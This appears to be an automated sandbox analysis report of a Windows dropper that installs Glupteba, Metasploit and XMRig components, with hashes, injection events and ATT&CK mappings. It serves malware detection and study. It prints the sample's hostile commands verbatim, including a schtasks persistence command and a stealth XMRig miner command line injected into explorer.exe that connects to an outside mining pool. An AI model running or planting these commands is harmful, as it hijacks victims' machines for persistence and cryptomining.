glupteba | 8050946d45275d1d9a207b61e1e7c69f906193fe120b111497bb15960f9ca379

Analysis

max time kernel
175s
max time network
165s
platform
windows10_x64
resource
win10-en
submitted
10-09-2021 21:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Fri192f077acf656dd.exe
Size

116KB
MD5

f43d41f88c343d2d97c010ec7269320d
SHA1

93d2e9e30cc7db5615bb113293ce2b24b848368a
SHA256

30d2e1ce1f57936fae0b6c7f70917e5b352dc8a891b3d012f762f79d2c46ccc1
SHA512

61282378378304381502cf3e6dd2d88e20345d1a62286893eae7d3101016f71823c341ad0c18865dce6c3a8e98f26e6657cdf65a30cfac171ca9cd04aac45db6

Score

10^/10

glupteba metasploit xmrig backdoor dropper loader miner trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

Processes:

resource	yara_rule
behavioral12/memory/2780-176-0x0000000004730000-0x000000000504E000-memory.dmp	family_glupteba
behavioral12/memory/2780-177-0x0000000000400000-0x0000000002577000-memory.dmp	family_glupteba
behavioral12/memory/532-180-0x0000000000400000-0x0000000002577000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 428 created 2780 428 svchost.exe LzmwAqmV.exe
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

description	pid	process	target process
PID 428 created 2780	428	svchost.exe	LzmwAqmV.exe

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral12/memory/4652-202-0x0000000140000000-0x0000000140763000-memory.dmp	xmrig
behavioral12/memory/4652-203-0x00000001402F327C-mapping.dmp	xmrig
behavioral12/memory/4652-207-0x0000000140000000-0x0000000140763000-memory.dmp	xmrig

Downloads MZ/PE file

Executes dropped EXE 13 IoCs

Processes:

Chrome 5.exe1.exe2.exe3.exe4.exe5.exe6.exeLzmwAqmV.exe7.exeBearVpn 3.exeLzmwAqmV.exeservices64.exesihost64.exe

pid	process
2872	Chrome 5.exe
756	1.exe
4048	2.exe
1044	3.exe
1460	4.exe
1688	5.exe
2416	6.exe
2780	LzmwAqmV.exe
3704	7.exe
1136	BearVpn 3.exe
532	LzmwAqmV.exe
532	services64.exe
4524	sihost64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

services64.exe

description pid process target process

PID 532 set thread context of 4652 532 services64.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

1384 756 WerFault.exe 1.exe
2352 3704 WerFault.exe 7.exe
3156 2416 WerFault.exe 6.exe
900 1688 WerFault.exe 5.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3448 schtasks.exe
4584 schtasks.exe

description	pid	process	target process
PID 532 set thread context of 4652	532	services64.exe	explorer.exe

pid	pid_target	process	target process
1384	756	WerFault.exe	1.exe
2352	3704	WerFault.exe	7.exe
3156	2416	WerFault.exe	6.exe
900	1688	WerFault.exe	5.exe

pid	process
3448	schtasks.exe
4584	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

LzmwAqmV.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	LzmwAqmV.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	process
2352	WerFault.exe
2352	WerFault.exe
2352	WerFault.exe
2352	WerFault.exe
2352	WerFault.exe
2352	WerFault.exe
2352	WerFault.exe
2352	WerFault.exe
2352	WerFault.exe
2352	WerFault.exe
2352	WerFault.exe
2352	WerFault.exe
2352	WerFault.exe
2352	WerFault.exe
2352	WerFault.exe
2352	WerFault.exe
1384	WerFault.exe
1384	WerFault.exe
1384	WerFault.exe
1384	WerFault.exe
1384	WerFault.exe
1384	WerFault.exe
1384	WerFault.exe
1384	WerFault.exe
1384	WerFault.exe
1384	WerFault.exe
1384	WerFault.exe
1384	WerFault.exe
1384	WerFault.exe
1384	WerFault.exe
1384	WerFault.exe
1384	WerFault.exe
3156	WerFault.exe
3156	WerFault.exe
3156	WerFault.exe
3156	WerFault.exe
3156	WerFault.exe
3156	WerFault.exe
3156	WerFault.exe
3156	WerFault.exe
3156	WerFault.exe
3156	WerFault.exe
3156	WerFault.exe
3156	WerFault.exe
3156	WerFault.exe
3156	WerFault.exe
3156	WerFault.exe
3156	WerFault.exe
900	WerFault.exe
900	WerFault.exe
900	WerFault.exe
900	WerFault.exe
900	WerFault.exe
900	WerFault.exe
900	WerFault.exe
900	WerFault.exe
900	WerFault.exe
900	WerFault.exe
900	WerFault.exe
900	WerFault.exe
900	WerFault.exe
900	WerFault.exe
900	WerFault.exe
900	WerFault.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

Processes:

1.exe2.exe3.exe4.exe5.exe6.exe7.exeBearVpn 3.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeLzmwAqmV.exesvchost.exeChrome 5.exeservices64.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	756	1.exe
Token: SeDebugPrivilege	4048	2.exe
Token: SeDebugPrivilege	1044	3.exe
Token: SeDebugPrivilege	1460	4.exe
Token: SeDebugPrivilege	1688	5.exe
Token: SeDebugPrivilege	2416	6.exe
Token: SeDebugPrivilege	3704	7.exe
Token: SeDebugPrivilege	1136	BearVpn 3.exe
Token: SeDebugPrivilege	2352	WerFault.exe
Token: SeDebugPrivilege	1384	WerFault.exe
Token: SeDebugPrivilege	3156	WerFault.exe
Token: SeDebugPrivilege	900	WerFault.exe
Token: SeDebugPrivilege	2780	LzmwAqmV.exe
Token: SeImpersonatePrivilege	2780	LzmwAqmV.exe
Token: SeTcbPrivilege	428	svchost.exe
Token: SeTcbPrivilege	428	svchost.exe
Token: SeDebugPrivilege	2872	Chrome 5.exe
Token: SeDebugPrivilege	532	services64.exe
Token: SeLockMemoryPrivilege	4652	explorer.exe
Token: SeLockMemoryPrivilege	4652	explorer.exe

Suspicious use of WriteProcessMemory 52 IoCs

Processes:

Fri192f077acf656dd.exe2.exesvchost.exeChrome 5.execmd.exeservices64.execmd.exe

description	pid	process	target process
PID 3812 wrote to memory of 2872	3812	Fri192f077acf656dd.exe	Chrome 5.exe
PID 3812 wrote to memory of 2872	3812	Fri192f077acf656dd.exe	Chrome 5.exe
PID 3812 wrote to memory of 756	3812	Fri192f077acf656dd.exe	1.exe
PID 3812 wrote to memory of 756	3812	Fri192f077acf656dd.exe	1.exe
PID 3812 wrote to memory of 4048	3812	Fri192f077acf656dd.exe	2.exe
PID 3812 wrote to memory of 4048	3812	Fri192f077acf656dd.exe	2.exe
PID 3812 wrote to memory of 1044	3812	Fri192f077acf656dd.exe	3.exe
PID 3812 wrote to memory of 1044	3812	Fri192f077acf656dd.exe	3.exe
PID 3812 wrote to memory of 1460	3812	Fri192f077acf656dd.exe	4.exe
PID 3812 wrote to memory of 1460	3812	Fri192f077acf656dd.exe	4.exe
PID 3812 wrote to memory of 1688	3812	Fri192f077acf656dd.exe	5.exe
PID 3812 wrote to memory of 1688	3812	Fri192f077acf656dd.exe	5.exe
PID 3812 wrote to memory of 2416	3812	Fri192f077acf656dd.exe	6.exe
PID 3812 wrote to memory of 2416	3812	Fri192f077acf656dd.exe	6.exe
PID 4048 wrote to memory of 2780	4048	2.exe	LzmwAqmV.exe
PID 4048 wrote to memory of 2780	4048	2.exe	LzmwAqmV.exe
PID 4048 wrote to memory of 2780	4048	2.exe	LzmwAqmV.exe
PID 3812 wrote to memory of 3704	3812	Fri192f077acf656dd.exe	7.exe
PID 3812 wrote to memory of 3704	3812	Fri192f077acf656dd.exe	7.exe
PID 3812 wrote to memory of 1136	3812	Fri192f077acf656dd.exe	BearVpn 3.exe
PID 3812 wrote to memory of 1136	3812	Fri192f077acf656dd.exe	BearVpn 3.exe
PID 3812 wrote to memory of 1136	3812	Fri192f077acf656dd.exe	BearVpn 3.exe
PID 428 wrote to memory of 532	428	svchost.exe	LzmwAqmV.exe
PID 428 wrote to memory of 532	428	svchost.exe	LzmwAqmV.exe
PID 428 wrote to memory of 532	428	svchost.exe	LzmwAqmV.exe
PID 2872 wrote to memory of 2780	2872	Chrome 5.exe	cmd.exe
PID 2872 wrote to memory of 2780	2872	Chrome 5.exe	cmd.exe
PID 2780 wrote to memory of 3448	2780	cmd.exe	schtasks.exe
PID 2780 wrote to memory of 3448	2780	cmd.exe	schtasks.exe
PID 2872 wrote to memory of 532	2872	Chrome 5.exe	services64.exe
PID 2872 wrote to memory of 532	2872	Chrome 5.exe	services64.exe
PID 532 wrote to memory of 4488	532	services64.exe	cmd.exe
PID 532 wrote to memory of 4488	532	services64.exe	cmd.exe
PID 532 wrote to memory of 4524	532	services64.exe	sihost64.exe
PID 532 wrote to memory of 4524	532	services64.exe	sihost64.exe
PID 4488 wrote to memory of 4584	4488	cmd.exe	schtasks.exe
PID 4488 wrote to memory of 4584	4488	cmd.exe	schtasks.exe
PID 532 wrote to memory of 4652	532	services64.exe	explorer.exe
PID 532 wrote to memory of 4652	532	services64.exe	explorer.exe
PID 532 wrote to memory of 4652	532	services64.exe	explorer.exe
PID 532 wrote to memory of 4652	532	services64.exe	explorer.exe
PID 532 wrote to memory of 4652	532	services64.exe	explorer.exe
PID 532 wrote to memory of 4652	532	services64.exe	explorer.exe
PID 532 wrote to memory of 4652	532	services64.exe	explorer.exe
PID 532 wrote to memory of 4652	532	services64.exe	explorer.exe
PID 532 wrote to memory of 4652	532	services64.exe	explorer.exe
PID 532 wrote to memory of 4652	532	services64.exe	explorer.exe
PID 532 wrote to memory of 4652	532	services64.exe	explorer.exe
PID 532 wrote to memory of 4652	532	services64.exe	explorer.exe
PID 532 wrote to memory of 4652	532	services64.exe	explorer.exe
PID 532 wrote to memory of 4652	532	services64.exe	explorer.exe
PID 532 wrote to memory of 4652	532	services64.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\Fri192f077acf656dd.exe
"C:\Users\Admin\AppData\Local\Temp\Fri192f077acf656dd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3812

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2872

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:2780

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
4⤵
- Creates scheduled task(s)
PID:3448

C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:532

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:4488

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
5⤵
- Creates scheduled task(s)
PID:4584

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:4524

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4652

C:\Users\Admin\AppData\Local\Temp\1.exe
"C:\Users\Admin\AppData\Local\Temp\1.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:756

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 756 -s 2036
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1384

C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4048

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2780

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:532

C:\Users\Admin\AppData\Local\Temp\3.exe
"C:\Users\Admin\AppData\Local\Temp\3.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1044

C:\Users\Admin\AppData\Local\Temp\5.exe
"C:\Users\Admin\AppData\Local\Temp\5.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1688 -s 1312
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:900

C:\Users\Admin\AppData\Local\Temp\6.exe
"C:\Users\Admin\AppData\Local\Temp\6.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2416

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2416 -s 1564
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3156

C:\Users\Admin\AppData\Local\Temp\7.exe
"C:\Users\Admin\AppData\Local\Temp\7.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3704

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3704 -s 1316
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2352

C:\Users\Admin\AppData\Local\Temp\4.exe
"C:\Users\Admin\AppData\Local\Temp\4.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1460

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1136

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:428

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER62E6.tmp.WERInternalMetadata.xml
MD5
577c80cb21c9d4a3eb8c96334adcb2a9

SHA1
b74d51f46e0ebae2195546aad61352c36e8ef5d0

SHA256
13c3d7d00ad200bbbbf5cc5d184d5371c45ad21dabbff9af6ba522fd85cc3679

SHA512
143d05a681865ea36f0af5d7e0938e20f1129ecafd609e958f879a9e161b998f7423e7fcf102bd363a07d4d1b627fd18a8b1acd1aaec3376d6dfc5beb967cb3e

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER62E6.tmp.WERInternalMetadata.xml
MD5
577c80cb21c9d4a3eb8c96334adcb2a9

SHA1
b74d51f46e0ebae2195546aad61352c36e8ef5d0

SHA256
13c3d7d00ad200bbbbf5cc5d184d5371c45ad21dabbff9af6ba522fd85cc3679

SHA512
